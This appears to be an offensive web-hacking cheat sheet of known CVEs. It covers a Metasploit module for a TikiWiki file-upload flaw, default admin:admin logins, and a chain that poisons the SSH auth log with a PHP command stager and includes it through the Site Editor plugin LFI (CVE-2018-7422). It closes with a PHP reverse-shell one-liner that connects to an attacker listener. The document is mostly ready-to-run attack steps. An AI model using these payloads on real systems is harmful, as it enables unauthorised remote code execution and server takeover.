Known web CVEs

TikiWiki file upload vulnerability

If you find an unrestricted file upload in TikiWiki, Metasploit has a module for it. Load it in msfconsole, review the required options with show options, then run it. Separately, TikiWiki installs often still accept the default login credentials admin:admin, which is worth trying on the login page.

# TikiWiki unrestricted file upload: load the module in msfconsole,
# set the target options and run it
use unix/webapp/tikiwiki_upload_exec

Log poisoning and LFI example: CVE-2018-7422 (WordPress Site Editor plugin)

# Poison the SSH auth log: sshd records a rejected login name verbatim
# ("Invalid user ... from ..."), so the username becomes a PHP stager stored in
# /var/log/auth.log (Debian/Ubuntu path; RHEL-style hosts log to /var/log/secure).
# Abort at the password prompt, the line is written before that.
ssh '<?php system($_GET["c"]); ?>'@IP

# Confirm the Local File Inclusion (CVE-2018-7422): ajax_path goes straight to include()
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

# Chain them: include the poisoned log (absolute path) and pass the command in c=
# The web server user must be able to read auth.log for this to work.
ajax_path=/var/log/auth.log&c=ifconfig

# Reverse shell to pass as the c= value (URL-encoded), after starting a listener on 10.0.0.1:1234
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Explanation:

  • ssh '<?php system($_GET["c"]); ?>'@IP attempts a login with a PHP stager as the username; sshd rejects it but writes the name unchanged into the auth log ("Invalid user ... from ..."). That is the poisoning step; nothing executes yet.

  • The LFI request reads /etc/passwd through the vulnerable Site Editor plugin: ajax_path is handed to include() without validation, so any file the web server user can read can be included (a path traversal / local file inclusion bug).

  • Chaining the two means including the poisoned log through the LFI: PHP parses the log as source, finds the stager, and runs whatever command arrives in c=. This needs the log to be readable by the web server user (auth.log is root:adm 0640 on Debian/Ubuntu by default, so it frequently is not) and the command to be URL-encoded so characters like &, < and ; survive the query string.

  • The php -r one-liner opens a TCP socket back to the attacker's listener and attaches /bin/sh to it, giving an interactive shell. Pass it as the c= value once the chain is confirmed with a harmless command such as ifconfig or id.
